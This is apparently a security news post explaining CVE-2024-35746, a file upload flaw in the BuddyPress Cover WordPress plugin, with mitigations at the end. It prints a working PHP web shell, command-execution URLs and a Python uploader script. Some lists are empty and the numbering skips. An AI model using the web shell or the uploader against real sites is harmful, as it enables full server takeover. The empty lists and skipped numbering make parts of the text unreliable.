CVE CyberSecurity Database News

CVE-2024-35746 - Exploiting Unrestricted File Upload in BuddyPress Cover (<=2.1.4.2)

Poster -

If you’re running a WordPress site with social networking features, there’s a decent chance you use the BuddyPress plugin. One popular add-on for this plugin is BuddyPress Cover, which lets users add cover photos to their profiles. This seems harmless—but in 2024, security researchers discovered a critical vulnerability in BuddyPress Cover, tracked as CVE-2024-35746. It allows any logged-in user to upload malicious files and potentially take over your site.

Let’s break down what this means, see how an attacker can exploit it, and find solutions to stay secure.

What Is CVE-2024-35746?

CVE-2024-35746 is an unrestricted file upload vulnerability. Specifically, versions of BuddyPress Cover up to 2.1.4.2 do not properly check which file types users are allowed to upload. With a bit of cunning, it’s possible to upload a file containing PHP code (like a webshell). If the server executes that file, the attacker gains full control of your website.

*Vendor*: Asghar Hatampoor
*Plugin Affected*: BuddyPress Cover
*Affected Versions*: All up to 2.1.4.2
*CWE ID*: CWE-434 - Unrestricted Upload of File with Dangerous Type

How Does The Vulnerability Work?

Normally, BuddyPress Cover is meant to let users upload image files (like .jpg, .png, .gif). But due to faulty checks, the server fails to properly restrict uploads to image file types. As a result, an attacker could upload a .php file that contains malicious code.

Once the PHP file is uploaded, the attacker can run it from their browser—typing something like http://your-site.com/wp-content/uploads/evil.php. Because the server processes PHP files, the attacker gains the same power as your web server. This can be used to:

Here’s what the malicious PHP file might look like (let’s call it shell.php)

<?php
if(isset($_REQUEST['cmd'])){
  system($_REQUEST['cmd']);
}
?>

This “shell” lets the attacker run any command by visiting

http://your-site.com/wp-content/uploads/shell.php?cmd=whoami

Suppose BuddyPress Cover stores uploads in wp-content/uploads/buddypress-cover/—replace this with the actual upload path on your server.

A vulnerable snippet from the plugin (simplified for clarity) might look like this

$filename = $_FILES['cover']['name'];
move_uploaded_file($_FILES['cover']['tmp_name'], "/uploads/" . $filename);

Notice there is no code checking the file type. The server just saves whatever the user uploads.

Proof-of-Concept Exploit (Python Script)

Below is a simple script to automate uploading a PHP shell if you have an account on a vulnerable BuddyPress Cover install.

import requests

url = 'http://target-site.com/wp-admin/profile.php';  # Change to the real URL

# You need to be logged in, so supply your WordPress cookies
cookies = {'wordpress_logged_in_XXXX': 'your_cookie'}

files = {
    'cover': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

response = requests.post(url, files=files, cookies=cookies)

print(response.status_code)
print('If success, try: http://target-site.com/wp-content/uploads/buddypress-cover/shell.php?cmd=id';)

Note: This PoC assumes BuddyPress Cover’s upload handler is at /profile.php, which may vary.

Real-World Impact

Any authenticated user can exploit this—not just admins. So if you allow open user registration, you’re at serious risk. Attackers can gain:

1. Update the Plugin

Go to your WordPress admin dashboard and update BuddyPress Cover to the latest version. The vendor has patched the bug in new releases.

As a backup, use .htaccess rules to prevent execution of PHP files in the uploads directory

# .htaccess in /wp-content/uploads/
<Files *.php>
    deny from all
</Files>

3. Use a Web Application Firewall (WAF)

Plugins such as Wordfence or Sucuri can block attack payloads.

Official Resources & References

- NVD – CVE-2024-35746 entry
- Plugin Vulnerabilities advisory
- BuddyPress Cover plugin page

Conclusion

CVE-2024-35746 is a serious flaw in BuddyPress Cover versions before 2.1.4.3 that allows any authenticated user to upload PHP shells and take over your WordPress website. If you run this plugin, update immediately and verify your server does not execute uploaded PHP files. Stay safe, and always keep plugins patched!


*Stay tuned for more security news and how-to guides!*

Timeline

Published on: 06/10/2024 17:16:30 UTC
Last modified on: 06/12/2024 17:36:02 UTC